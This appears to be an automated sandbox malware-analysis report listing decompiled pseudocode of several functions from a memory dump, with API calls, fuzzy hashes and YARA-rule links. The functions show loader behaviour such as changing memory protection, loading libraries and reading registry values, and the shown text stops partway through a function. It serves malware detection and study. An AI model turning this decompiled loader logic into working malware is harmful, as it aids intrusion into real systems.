Instruction ID: 8ed72daee4dbcfbcbb80ce2e7c39b85b34c1c88262de071aa2489042e8aa3d9e
Opcode Fuzzy Hash: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
Instruction Fuzzy Hash: 09E09231315B112B97022AAD4D9CFAB7B9DDF973717020335F524D22D4DB588C2A89B5

Uniqueness

Uniqueness Score: -1.00%

Function 00A74A3C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A74A3C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00A74380(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xa7a2d0; // 0x4aed5a8
				_t4 = _t24 + 0xa7bd90; // 0x5569338
				_t5 = _t24 + 0xa7bd38; // 0x4f0053
				_t26 = E00A730AD( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xa7a2d0; // 0x4aed5a8
						_t11 = _t32 + 0xa7bd84; // 0x556932c
						_t48 = _t11;
						_t12 = _t32 + 0xa7bd38; // 0x4f0053
						_t55 = E00A74DC8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0xa7a2d0; // 0x4aed5a8
							_t13 = _t35 + 0xa7bdce; // 0x30314549
							if(E00A75EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0xa7a2b4 - 6;
								if( *0xa7a2b4 <= 6) {
									_t42 =  *0xa7a2d0; // 0x4aed5a8
									_t15 = _t42 + 0xa7bbda; // 0x52384549
									E00A75EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0xa7a2d0; // 0x4aed5a8
							_t17 = _t38 + 0xa7bdc8; // 0x5569370
							_t18 = _t38 + 0xa7bda0; // 0x680043
							_t45 = E00A733B7(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0xa7a290, 0, _t55);
						}
					}
					HeapFree( *0xa7a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00A73EFA(_t54);
				}
				return _t45;
			}

0x00a74a3c
0x00a74a4c
0x00a74a4f
0x00a74a56
0x00a74a58
0x00a74a58
0x00a74a5b
0x00a74a60
0x00a74a67
0x00a74a74
0x00a74a79
0x00a74a7d
0x00a74a8b
0x00a74a99
0x00a74a9d
0x00a74b2e
0x00a74b2e
0x00a74aa3
0x00a74aa3
0x00a74aa8
0x00a74aa8
0x00a74aaf
0x00a74abb
0x00a74abd
0x00a74abf
0x00a74ac1
0x00a74ac8
0x00a74ada
0x00a74adc
0x00a74ae3
0x00a74ae5
0x00a74aec
0x00a74af7
0x00a74af7
0x00a74ae3
0x00a74afc
0x00a74b01
0x00a74b08
0x00a74b26
0x00a74b28
0x00a74b28
0x00a74abf
0x00a74b3a
0x00a74b3a
0x00a74b3c
0x00a74b41
0x00a74b43
0x00a74b43
0x00a74b4e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05569338,00000000,?,73BCF710,00000000,73BCF730), ref: 00A74A8B
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05569370,?,00000000,30314549,00000014,004F0053,0556932C), ref: 00A74B28
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A71BD5), ref: 00A74B3A

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bdac5b01dbe554f25e64cd8437655188e2c23dfdf1b180b5062960b7e7c2c13f
Instruction ID: e20055a5143454d821f0f2019c29c4955219730ff111f3896414cab1ca55a1c4
Opcode Fuzzy Hash: bdac5b01dbe554f25e64cd8437655188e2c23dfdf1b180b5062960b7e7c2c13f
Instruction Fuzzy Hash: 0B316C72900208BEEB21DBD4DD85EAE7BBCEF88300F15C095F50DA7062D771AE459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7243C, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A7243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xa7a2d0; // 0x4aed5a8
				_t2 = _t22 + 0xa7b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xa7a2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xa7a2a4 =  *0xa7a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E00A73F12(_t49, _t48);
					_t33 = E00A745E6(_t46, _t48, _t49);
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xa7a2a4 < 5) {
							 *0xa7a2a4 =  *0xa7a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00A72813();
					HeapFree( *0xa7a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xa7a390; // 0x5568d6c
				if(RtlAllocateHeap( *0xa7a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E00A76DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x00a7243c
0x00a72443
0x00a7244a
0x00a7244e
0x00a72453
0x00a7245e
0x00a7246e
0x00a724b1
0x00a724b5
0x00a724b9
0x00a724ba
0x00a724bd
0x00a724c2
0x00a724c2
0x00a724c5
0x00a724c9
0x00a72503
0x00a72503
0x00a72509
0x00a72510
0x00a72510
0x00a724cb
0x00a724ce
0x00a724d0
0x00a724dd
0x00a724df
0x00a724e6
0x00a7251d
0x00a72522
0x00a72524
0x00a72526
0x00a72526
0x00000000
0x00a72524
0x00a724e8
0x00a724ef
0x00a724fd
0x00000000
0x00a724fd
0x00a72470
0x00a7248b
0x00a724a5
0x00000000
0x00a724a5
0x00a7249e
0x00000000

APIs

wsprintfA.USER32 ref: 00A7245E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A72483

Part of subcall function 00A76DB7: GetTickCount.KERNEL32 ref: 00A76DCE
Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E1B
Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E38
Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E58
Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E76
Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76E99
Part of subcall function 00A76DB7: wsprintfA.USER32 ref: 00A76EBA

HeapFree.KERNEL32(00000000,00A71C1F,?,?,00A71C1F,?), ref: 00A724FD

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 566d6cfd904807db44dfd9a4a3bd52415d097d822522b4a1cf54c0ebae0049f8
Instruction ID: 515bb2133aed9b30dbb80a1a698f1600d6821ccadddbb7439f657b7e1fc55fb3
Opcode Fuzzy Hash: 566d6cfd904807db44dfd9a4a3bd52415d097d822522b4a1cf54c0ebae0049f8
Instruction Fuzzy Hash: 1E312772500109EFCB11DFA4DD84BDE3BB8FB58310F10C022F909AB261D7749A858BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E051030, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E051030(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e0541cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
GetLastError.KERNEL32 ref: 6E0510E4

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
Instruction ID: 5b767498cca2c9a758986dbc7570da5707bcf5d542afa3c0b51a439388255033
Opcode Fuzzy Hash: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
Instruction Fuzzy Hash: 4E217131800706EFCB14CFD5C985AAAF7F5FF08359F008959D00697645E3B8AAA9CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E0516EC, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E0516EC() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6e0541c4);
				_push(1);
				_push( *0x6e0541d0 + 0x6e055089);
				 *0x6e0541c0 = 0xc;
				 *0x6e0541c8 = 0; // executed
				L6E0514D8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6E051112( &_v44,  &_v28,  *0x6e0541cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6e0541b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6E051979(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6e0541b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6E052112(_t40, _t30 + 4);
					}
				}
				_t23 = E6E051236(_v44); // executed
				goto L7;
			}

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E0541C4,00000000), ref: 6E05171D
lstrlenW.KERNEL32(?,?,?), ref: 6E051751

Part of subcall function 6E051979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
Part of subcall function 6E051979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
Part of subcall function 6E051979: _snwprintf.NTDLL ref: 6E0519C1
Part of subcall function 6E051979: CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
Part of subcall function 6E051979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
Part of subcall function 6E051979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32

ExitThread.KERNEL32 ref: 6E0517A0

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
Instruction ID: c01210947d0740676197c76e87fd54ee9d7d1d970e1d7454f3677e6546de2df0
Opcode Fuzzy Hash: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
Instruction Fuzzy Hash: 98118B72104B06AFDB00DFA8CA88EDB7BFCEB55754F00091AF115D7240DB30E9298B95

Uniqueness

Uniqueness Score: -1.00%

Function 00A7274E, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00A7274E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0xa7a380;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E00A74E9C(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E00A733FA(_t19);
					if(_t20 == 0) {
						HeapFree( *0xa7a290, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0xa7a388; // 0x5569c50
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x00a72755
0x00a7275c
0x00a7275f
0x00a72766
0x00a7276b
0x00a7276d
0x00a72774
0x00a7277b
0x00000000
0x00000000
0x00a7277d
0x00a72782
0x00a72783
0x00a7278a
0x00a727a4
0x00000000
0x00a7278c
0x00a7278c
0x00a7278e
0x00a72791
0x00a72795
0x00000000
0x00000000
0x00a72797
0x00a72795
0x00a727ae
0x00a727b0
0x00a727b6
0x00a727b8
0x00a727be
0x00a727c5
0x00a727d5
0x00a727cd
0x00a727d0
0x00a727d0
0x00a727d8
0x00a727d8
0x00a727e2
0x00a727e2
0x00a727aa
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A7276B

Part of subcall function 00A74E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00A7A380), ref: 00A74EC7
Part of subcall function 00A74E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00A74EE9
Part of subcall function 00A74E9C: memset.NTDLL ref: 00A74F03
Part of subcall function 00A74E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00A74F41
Part of subcall function 00A74E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00A74F55
Part of subcall function 00A74E9C: FindCloseChangeNotification.KERNELBASE(?), ref: 00A74F6C
Part of subcall function 00A74E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00A74F78
Part of subcall function 00A74E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 00A74FB9
Part of subcall function 00A74E9C: FindFirstFileA.KERNELBASE(?,?), ref: 00A74FCF

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A727B0

Part of subcall function 00A733FA: lstrlen.KERNEL32(?,00A7A380,73BB7FC0,00000000,00A72788,?,?,?,?,?,00A73EAC,?), ref: 00A73403
Part of subcall function 00A733FA: mbstowcs.NTDLL ref: 00A7342A
Part of subcall function 00A733FA: memset.NTDLL ref: 00A7343C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00A73EAC,?), ref: 00A727A4

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 1489712272-0
Opcode ID: d86c97641872ddf925d93f62ae2349f2d94f75eed18ecaa176ed4af2f8b1a783
Instruction ID: 5c1bf150cfbaa083dbbdd3e63413d865dbe05fa2a8ad543001b573a2de5fd052
Opcode Fuzzy Hash: d86c97641872ddf925d93f62ae2349f2d94f75eed18ecaa176ed4af2f8b1a783
Instruction Fuzzy Hash: 1311E13A600208FFEB049BE5DE80BAD77B8EB44325F60C022E409DA090D3759E829B61

Uniqueness

Uniqueness Score: -1.00%

Function 00A7779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A7779E(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xa7a2d0; // 0x4aed5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xa7ba60; // 0x4f0053
				_v16 = 4;
				_t31 = E00A74C7C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xa7a2d0; // 0x4aed5a8
					_t5 = _t19 + 0xa7babc; // 0x6e0049
					_t34 = E00A74C7C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00A72A03(_t34);
					}
					E00A72A03(_t31);
				}
				return _v8;
			}

0x00a777a4
0x00a777a9
0x00a777ae
0x00a777b5
0x00a777c1
0x00a777c5
0x00a777c7
0x00a777cd
0x00a777d9
0x00a777dd
0x00a777f0
0x00a777f8
0x00a7780c
0x00a77814
0x00a77816
0x00a77816
0x00a7781d
0x00a7781d
0x00a77824
0x00a77824
0x00a7782a
0x00a7782f
0x00a77835

APIs

Part of subcall function 00A74C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A777C1,004F0053,00000000,?), ref: 00A74C85
Part of subcall function 00A74C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A777C1,004F0053,00000000,?), ref: 00A74CAF
Part of subcall function 00A74C7C: memset.NTDLL ref: 00A74CC3

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00A777F0
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00A7780C
RegCloseKey.ADVAPI32(00000000), ref: 00A7781D

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 76bfdbc80d618b126ae43fe831e192dab488013774b1303717e44b323505f2e5
Instruction ID: 39b1a8267f2bd3ed321f82c208bae03924d97c4ed57842d914eb99719cbc269c
Opcode Fuzzy Hash: 76bfdbc80d618b126ae43fe831e192dab488013774b1303717e44b323505f2e5
Instruction Fuzzy Hash: 0B116172900209BFD711DBD8DD89FEEB7BCAB54340F10C059B609E7061E7709A458B65

Uniqueness

Uniqueness Score: -1.00%

Function 6E065A90, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 261memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0

Strings

*, xrefs: 6E065D15

Memory Dump Source

Source File: 00000002.00000002.1182968404.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID: *
API String ID: 544645111-163128923
Opcode ID: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction ID: 1af9be0c50490d788411db38c00b1ab38a0aeee472bf7b6596d62abcdbc9949e
Opcode Fuzzy Hash: 09d7b9a43baecd1fd2e2c2f10d99bf052fa634b408aa3c5cbce8f40cafb077a4
Instruction Fuzzy Hash: DAD11674908518EFCB08CF99C198AACBBF2FF8A300F50E55AE445AB359D7345A42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A77471, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00A77471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00A7344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xa7a2d0; // 0x4aed5a8
						_t20 = _t68 + 0xa7b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00A72986(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00a77477
0x00a7747a
0x00a7748a
0x00a77493
0x00a77497
0x00a77565
0x00a7756b
0x00a7756b
0x00a774b1
0x00a774b6
0x00a774ba
0x00a774c0
0x00a774c5
0x00a774cc
0x00a774db
0x00a774db
0x00a774df
0x00a774e1
0x00a774ed
0x00a774f8
0x00a77503
0x00a77507
0x00a77511
0x00a77515
0x00a77517
0x00a7751c
0x00a77523
0x00a77533
0x00a77533
0x00a7751c
0x00a77515
0x00a77535
0x00a7753a
0x00a7753f
0x00a7753f
0x00a77545
0x00a7754b
0x00a77550
0x00a77550
0x00a77555
0x00a7755a
0x00a7755a
0x00a77555
0x00a774df
0x00a7755c
0x00a77562
0x00000000

APIs

Part of subcall function 00A7344C: SysAllocString.OLEAUT32(80000002), ref: 00A734A3
Part of subcall function 00A7344C: SysFreeString.OLEAUT32(00000000), ref: 00A73508

SysFreeString.OLEAUT32(?), ref: 00A77550
SysFreeString.OLEAUT32(00A720DE), ref: 00A7755A

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 299bccc60ad99af7ecd0a2657e4492a00edb8cb3234b743d931a1cad79778f7e
Instruction ID: 50f99fbd58fe213e172b3dff2c5501b4e8261f0e24beda58747bc8a0de1555ef
Opcode Fuzzy Hash: 299bccc60ad99af7ecd0a2657e4492a00edb8cb3234b743d931a1cad79778f7e
Instruction Fuzzy Hash: 93310772600119AFCB11DFA9CC88C9FBB7AFBC9740715C658F9199B220D632DD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E051F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E051F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e0541cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
